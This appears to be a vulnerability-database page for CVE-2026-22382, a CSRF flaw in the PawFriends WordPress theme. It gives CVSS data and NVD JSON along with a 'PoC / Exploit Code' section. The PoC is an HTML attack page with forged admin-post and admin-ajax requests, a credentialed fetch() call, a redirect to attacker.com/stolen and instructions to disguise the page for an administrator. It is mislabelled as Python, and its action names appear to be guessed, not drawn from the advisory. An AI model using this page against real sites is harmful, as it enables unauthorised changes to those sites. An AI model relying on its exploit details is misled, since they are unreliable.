Security Vulnerability Report
中文
CVE-2026-22382 CVSS 5.4 MEDIUM

CVE-2026-22382

Published: 2026-01-22 17:16:32
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in Mikado-Themes PawFriends - Pet Shop and Veterinary WordPress Theme pawfriends allows Cross Site Request Forgery.This issue affects PawFriends - Pet Shop and Veterinary WordPress Theme: from n/a through <= 1.3.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

PawFriends - Pet Shop and Veterinary WordPress Theme <= 1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-22382 --> <!-- This PoC demonstrates how an attacker can trick an admin into executing unauthorized actions --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2026-22382</title> </head> <body> <h1>CSRF PoC for PawFriends WordPress Theme</h1> <p>诱骗管理员点击以下按钮以执行未授权操作:</p> <!-- 伪造的主题设置修改请求 --> <form action="http://target-site/wp-admin/admin-post.php" method="POST" id="csrf-form"> <input type="hidden" name="action" value="pawfriends_save_settings"> <input type="hidden" name="theme_option" value="malicious_value"> <input type="hidden" name="redirect_url" value="http://attacker.com/stolen"> </form> <!-- 伪造的评论删除请求 --> <form action="http://target-site/wp-admin/admin-ajax.php" method="POST" id="csrf-ajax"> <input type="hidden" name="action" value="pawfriends_delete_comment"> <input type="hidden" name="comment_id" value="1"> </form> <button type="submit" form="csrf-form">点击这里查看图片</button> <script> // 自动提交表单(无用户交互) // document.getElementById('csrf-form').submit(); // 或使用fetch API发送请求 fetch('http://target-site/wp-admin/admin-post.php', { method: 'POST', credentials: 'include', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'action=pawfriends_save_settings&theme_option=malicious_value' }); </script> <p><strong>说明:</strong>实际攻击中,攻击者会将此页面伪装成正常内容,诱导管理员访问。</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22382", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:32.233", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Mikado-Themes PawFriends - Pet Shop and Veterinary WordPress Theme pawfriends allows Cross Site Request Forgery.This issue affects PawFriends - Pet Shop and Veterinary WordPress Theme: from n/a through <= 1.3."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en el tema de WordPress Mikado-Themes PawFriends - Pet Shop and Veterinary pawfriends permite la falsificación de petición en sitios cruzados. Este problema afecta al tema de WordPress PawFriends - Pet Shop and Veterinary: desde n/a hasta &lt;= 1.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/pawfriends/vulnerability/wordpress-pawfriends-pet-shop-and-veterinary-wordpress-theme-theme-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}